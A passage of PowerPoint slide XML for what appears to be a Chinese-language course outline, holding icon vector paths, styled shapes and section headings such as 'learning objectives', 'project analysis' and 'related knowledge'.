                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
